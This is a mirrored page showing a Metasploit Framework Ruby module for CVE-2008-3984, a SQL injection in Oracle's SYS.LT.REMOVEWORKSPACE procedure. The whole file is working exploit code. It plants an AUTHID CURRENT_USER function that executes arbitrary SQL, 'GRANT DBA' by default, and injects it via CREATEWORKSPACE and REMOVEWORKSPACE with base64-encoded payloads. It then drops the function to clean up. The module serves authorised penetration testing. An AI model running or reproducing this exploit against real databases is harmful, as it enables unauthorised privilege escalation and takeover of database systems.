CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',

12
      'Description'    => %q{

13
        This module exploits a sql injection flaw in the REMOVEWORKSPACE

14
        procedure of the PL/SQL package SYS.LT. Any user with execute

15
        privilege on the vulnerable package can exploit this vulnerability.

16
      },

17
      'Author'         => [ 'Sh2kerr <research[ad]dsecrg.com>' ],

18
      'License'        => MSF_LICENSE,

19
      'References'     =>

20
        [

21
          [ 'CVE', '2008-3984' ],

22
          [ 'OSVDB', '49326']

23
        ],

24
      'DisclosureDate' => '2008-10-13'))

25


26
      register_options(

27
        [

28
          OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),

29
        ])

30
  end

31


32
  def run

33
    return if not check_dependencies

34


35
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

36
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

37
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

38
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

39
    cruft = Rex::Text.rand_text_alpha_upper(1)

40


41
    function = "

42
      CREATE OR REPLACE FUNCTION #{cruft}

43
      RETURN VARCHAR2 AUTHID CURRENT_USER

44
      AS

45
      PRAGMA AUTONOMOUS_TRANSACTION;

46
      BEGIN

47
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

48
      COMMIT;

49
      RETURN '#{cruft}';

50
      END;"

51


52
    package1 = %Q|

53
      BEGIN

54
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

55
      END;

56
      |

57


58
    package2 = %Q|

59
      BEGIN

60
        SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

61
      END;

62
      |

63


64
    uno  = Rex::Text.encode_base64(function)

65
    dos  = Rex::Text.encode_base64(package1)

66
    tres = Rex::Text.encode_base64(package2)

67


68
    sql = %Q|

69
      DECLARE

70
      #{rand1} VARCHAR2(32767);

71
      #{rand2} VARCHAR2(32767);

72
      #{rand3} VARCHAR2(32767);

73
      BEGIN

74
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

75
      EXECUTE IMMEDIATE #{rand1};

76
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

77
      EXECUTE IMMEDIATE #{rand2};

78
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));

79
      EXECUTE IMMEDIATE #{rand3};

80
      END;

81
      |

82


83
    clean = "DROP FUNCTION #{cruft}"

84


85
    # Try first, if it's good.. keep doing the dance.

86
    print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...")

87
    begin

88
      prepare_exec(sql)

89
    rescue => e

90
      return

91
    end

92


93
    print_status("Removing function '#{cruft}'...")

94
    prepare_exec(clean)

95


96
  end

97
end

98


99